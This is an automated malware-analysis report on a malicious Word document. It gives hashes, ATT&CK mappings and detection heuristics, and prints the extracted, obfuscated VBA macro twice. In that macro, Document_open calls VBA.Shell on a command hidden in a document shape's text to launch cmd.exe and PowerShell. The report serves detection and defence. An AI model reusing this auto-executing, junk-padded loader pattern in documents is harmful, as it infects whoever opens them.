Office (OLE) malware analysis — malicious · d2b20efd72668025

MALICIOUS

Office (OLE)

72.5 KB Created: 2018-11-09 09:56:00 Authoring application: Microsoft Office Word First seen: 2018-11-13

MD5: 4f085ab84b7a25690cc35a622e3dcf59 SHA-1: 9b17600bb6cacee71e913d838b8d63fc45f1f550 SHA-256: d2b20efd72668025b8e1cf8e744bbcfca24921417df3e324b97bf5e968e849a0

270 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.001 PowerShell T1059.003 Windows Command Shell T1204.002 Malicious File

The sample contains a VBA macro that triggers on document opening. This macro utilizes the Shell() function to execute a command-line interface command, specifically invoking cmd.exe with a /c flag. The command string appears to be heavily obfuscated, but references to PowerShell and cmd.exe are present, indicating an attempt to download and execute a secondary payload. The ClamAV detection further supports the malicious nature of the file.

Heuristics 8

ClamAV: Doc.Malware.Generic-6745249-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Generic-6745249-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

   TimeValue HirzNn + woFph + ToQmm + Gdmbs - zuArjn + hFuljv + DRHjaF + rihzUs + qzUDw + NtVHH * (OzFYD + qqCoWF)
jvBwqps = VBA.Shell(Shapes(HLSrMu + IaikqiKv + 1 + JrimKi + CQBbOCL).TextFrame.TextRange.Text + hDPvW + zwUvA, wGtSLCwQzS)
End Function

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
End Function
Private Sub Document_open()
On Error Resume Next
```
Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Reference to PowerShell high SC_STR_POWERSHELL

Reference to PowerShell
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1395 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1395 bytes
SHA-256: `3276ee5e58bd1404454dbe42918bee06bc956f6a0ce4e691dbc606c12151912b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "MEkjjik" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function hDisPjbw() On Error Resume Next Const wGtSLCwQzS = 691184524 - 691184524 TimeValue PliBP + sEbYpL + VFqjvz + jHGnDC * WGnTAi + CQatJr + FVfuLD + WPHfZ FormatDateTime (YzCfJ + CQwwPE * (wBcNC + SDTNfk * (GvcUZZ + ELXazS + NbvYUr + BFvYb / (KzEkWv + bGnbX)))) FormatDateTime (MimEQ + zMbZj + (FrfXh + LiPjYE + AHCwW + jVddc * (PrrVkw + wGYmdW))) TimeValue HirzNn + woFph + ToQmm + Gdmbs - zuArjn + hFuljv + DRHjaF + rihzUs + qzUDw + NtVHH * (OzFYD + qqCoWF) jvBwqps = VBA.Shell(Shapes(HLSrMu + IaikqiKv + 1 + JrimKi + CQBbOCL).TextFrame.TextRange.Text + hDPvW + zwUvA, wGtSLCwQzS) End Function Private Sub Document_open() On Error Resume Next FormatNumber (sWjrvj + BnYis + phLjZz + dsldmk * pMKXd + ZIEhKP * kfPqN + QSQmnW + jOAlD + LMjpd - FzRjc + WKqrzc) FormatDateTime (JTDYZ + AbMKI * (iFDvE + moHdzm / JRMKpQ + qovrJ)) FormatDateTime AdmGY + zQGvn / qGHfU + lQEoR + tjdqJ + mwain TimeValue (sNfKAF + BJikj / XrWzC + MPNoi) hDisPjbw FormatDateTime fZABtL + LcWRC + unQtzd + tcmlz + EOPGi + LNziFE FormatNumber JqhLSd + cEFGEi / VkBtJ + puaacb End Sub

SHA-256: 3276ee5e58bd1404454dbe42918bee06bc956f6a0ce4e691dbc606c12151912b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "MEkjjik"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function hDisPjbw()
On Error Resume Next
Const wGtSLCwQzS = 691184524 - 691184524
   TimeValue PliBP + sEbYpL + VFqjvz + jHGnDC * WGnTAi + CQatJr + FVfuLD + WPHfZ
   FormatDateTime (YzCfJ + CQwwPE * (wBcNC + SDTNfk * (GvcUZZ + ELXazS + NbvYUr + BFvYb / (KzEkWv + bGnbX))))
   FormatDateTime (MimEQ + zMbZj + (FrfXh + LiPjYE + AHCwW + jVddc * (PrrVkw + wGYmdW)))
   TimeValue HirzNn + woFph + ToQmm + Gdmbs - zuArjn + hFuljv + DRHjaF + rihzUs + qzUDw + NtVHH * (OzFYD + qqCoWF)
jvBwqps = VBA.Shell(Shapes(HLSrMu + IaikqiKv + 1 + JrimKi + CQBbOCL).TextFrame.TextRange.Text + hDPvW + zwUvA, wGtSLCwQzS)
End Function
Private Sub Document_open()
On Error Resume Next
   FormatNumber (sWjrvj + BnYis + phLjZz + dsldmk * pMKXd + ZIEhKP * kfPqN + QSQmnW + jOAlD + LMjpd - FzRjc + WKqrzc)
   FormatDateTime (JTDYZ + AbMKI * (iFDvE + moHdzm / JRMKpQ + qovrJ))
   FormatDateTime AdmGY + zQGvn / qGHfU + lQEoR + tjdqJ + mwain
   TimeValue (sNfKAF + BJikj / XrWzC + MPNoi)
hDisPjbw
   FormatDateTime fZABtL + LcWRC + unQtzd + tcmlz + EOPGi + LNziFE
   FormatNumber JqhLSd + cEFGEi / VkBtJ + puaacb
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.